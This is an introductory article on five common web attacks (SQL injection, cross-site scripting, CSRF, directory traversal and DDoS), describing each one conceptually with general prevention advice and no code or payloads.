1. SQL Injection (SQLi)
The SQL injection is the most common web security issue faced by most of the companies. An SQL injection is the injection attack where hackers can input malicious SQL queries to pull sensitive data from the database. These SQL queries manipulate database server and pull information like user logins, admin logins, card details etc. The hacker can add, delete or modify existing records in the database. SQL injection attacks can also bypass application security measures.
SQL injection attacks are one of the oldest and most dangerous attacks that hackers have been using to steal sensitive data and sometimes to deface the entire website. It is listed in OWASP top 10 as the most dangerous vulnerability for a web app that uses an SQL database.
How to prevent SQL injection?
The best way a developer can avoid SQL injection attacks is to use parameterized database queries with bound, typed parameters and careful use of parameterized stored procedures in the database. This can be achieved in many programming languages like .NET, PHP, Java etc. Please refer to the following links to implement parameterized queries in your code.
The other methods to prevent SQL injection is to install update and patches as soon as possible. Investing in a good Web application firewall will shoo away hackers from exploiting your website.
2. Cross-Site Scripting(XSS)
Cross-site scripting vulnerabilities are one of the most occurred vulnerabilities in web applications. XSS enables a hacker to inject client-side scripts to alter the web page that is viewed by other users.
XSS is mainly categorized into two, that is permanent XSS and reflected XSS. Permanent XSS happens when the payload is reflected in the web page, I.e; when the attacker crafts an attack payload using a comment box and post the comment, the attack payload get saved in the web page and it will trigger every time a user visits the page. This makes permanent XSS much more dangerous than the Reflected. Reflected XSS happens when the attack payload is in URL or in POST. it is not get saved anywhere in the page which makes it less dangerous than the former.
XSS attacks are usually used to steal cookies, CSRF tokens or to make arbitrary modifications to DOM contents etc.
How to prevent XSS?
To prevent XSS, you must sanitize all user input. Ensure all the user inputted data is reflecting in the browser only after checking for malicious codes(attack vectors). Investing in a good WAF also helps to secure your web application against XSS attacks. Read more about XSS attacks and prevention methods
3. Cross-site request forgery(CSRF)
When you are browsing a website, it is normal that it requests resources from another website like an embedded video or an image hosted on another website or any other resources. If such requests are not handled properly, an attacker can launch a Cross-site request forgery attack. A cross-site request forgery a.k.a session riding is a type of attack in which the user is forced to execute malicious commands in the web application where he is currently authenticated. The malicious website can do this by specially crafted images, JavaScript codes, hidden forms etc. Unlike XSS, CSRF exploits the trust a web application has in users browsers. In XSS, the trust a user has in a web site has been exploited.
How to prevent CSRF?
An attacker is able to trigger a cross-site forgery attack because he knows the exact parameter and value combination of a form that is being used. so by adding a new parameter with an unknown value to the attacker and can be validated by the server, it is possible to block CSRF attacks. This can be done using by implementing an Anti-CSRF token or using the same-site flag in cookies.
Cross-site request forgery: OWASP
4. Directory traversal
Directory traversal is an HTTP attack in which the attacker can access restricted directories and files and execute commands outside of root directory. This attack can compromise sensitive data and even lead to compromise the entire web server. Directory traversal usually occurs due to the insufficient and improper validation of browser input from the user.
How to prevent directory traversal?
The easiest way to prevent directory traversal is to install the latest updates and patches of your web server software and keep it up to date. Validate user input and filter out malicious inputs that may lead to directory traversal. Investing in a good WAF also helps prevent directory traversal attacks.
Path traversal:OWASP
5. Distributed Denial of service(DDOS)
To understand distributed denial of service we need to understand the denial of service attack first. In a DOS attack, large amount of web traffic is sent against the targeted web server which may use up the bandwidth of the web server and lead to the complete denial of services. An attacker may flood traffic by sending huge volume of TCP, UDP and ICMP packets.
The DOS attack typically uses only one computer and an internet connection to flood targeted system and resources. This may ineffective against servers having huge bandwidth. To target such servers a group of computers/botnets are used to perform the DOS attack, which is called as a Distributed denial of service attack or DDOS.
How to prevent a DDOS attack?
One way to prevent DDOS attack is to identify it earlier, understand your normal users and understand from where the traffic spikes come from. Block all the traffic from questionable sources. Over provision of bandwidth also helps to mitigate a DDOS attack to an extent.